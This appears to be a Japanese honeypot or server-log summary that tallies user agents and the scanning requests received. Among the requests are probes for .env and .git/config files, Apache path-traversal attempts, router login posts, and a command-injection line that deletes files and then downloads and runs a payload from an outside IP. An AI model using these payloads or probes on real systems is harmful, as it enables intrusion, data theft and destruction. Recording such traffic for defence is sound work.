4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
38	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
11	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Python-urllib/3.6`
1	`python-requests/2.28.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
18		`\x16\x03\x01`
2	CONNECT	`google[.]com:443`	HTTP/1.1
41	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
4	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+137[.]175[.]17[.]190/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
11	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cn/cmd`	HTTP/1.1
1	POST	`/dvr/cmd`	HTTP/1.1
3	PRI	`*`	HTTP/2.0